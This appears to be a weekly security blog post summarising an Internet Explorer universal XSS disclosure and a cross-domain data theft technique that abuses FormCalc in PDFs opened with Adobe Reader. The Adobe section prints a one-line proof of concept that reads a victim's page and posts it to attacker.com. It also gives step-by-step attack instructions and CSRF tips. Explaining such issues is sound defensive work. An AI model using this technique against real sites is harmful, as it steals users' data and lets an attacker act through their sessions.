Universal IE XSS and Cross Domain Data Theft with Adobe Reader - Week 2

Internet Explorer Universal XSS

We read a nice analysis of Internet Explorer Universal XSS which was disclosed on Full Disclosure last week.

It is quite simple to exploit and the code speaks for itself:

Quick Facts

  • Microsoft will release a fix.
  • There is also another PoC which doesn't require user interaction.
  • Only mitigation is sending XFO headers in all files, which is not quite possible.
  • Claimed that this is a regression of CVE-2014-0293 which we couldn't find information about.

Cross Domain Data Theft Via Adobe Reader

It's been in the wild for a long time so you might have heard about this already, but wanted to talk about it here in case you missed. We all know hosting user generated content in your actual domain isn't the best thing to do, but thanks to Adobe Reader, there is more!

If you allow viewing user uploaded PDF files through your website, they can use this to steal content and post it to another domain.

PDF supports a scripting language called formcalc. That particular scripting language has really interesting functions called GET, POST and PUT. As you can guess, those functions are making cookie carrying HTTP requests to the origin which hosts the file. You can read those in detail from original documentation here.

Here is the PoC in formcalc

var content = GET("myfriends.php"); Post("http://attacker.com",content);

Attack ToDo

  1. Create a PDF file which has desired attack plan, which probably tries to extract sensitive information.
  2. Upload that file to the target website.
  3. Find its URL.
  4. Send its URL to victim with hoping her to click.
  5. Go have some sleep until hearing from the victim.

Quick Facts

  • We tested this with IE + Adobe 11, which worked without any issues.
  • You need to have a liberal crossdomain.xml on your domain at attacker.com to enable cross-domain posting. We found one for you and put it here.
  • If you don't want to exfiltrate any data or this was being prevented in the future, you can still do CSRF with this since you can read the response, extract tokens and hit the particular functionality!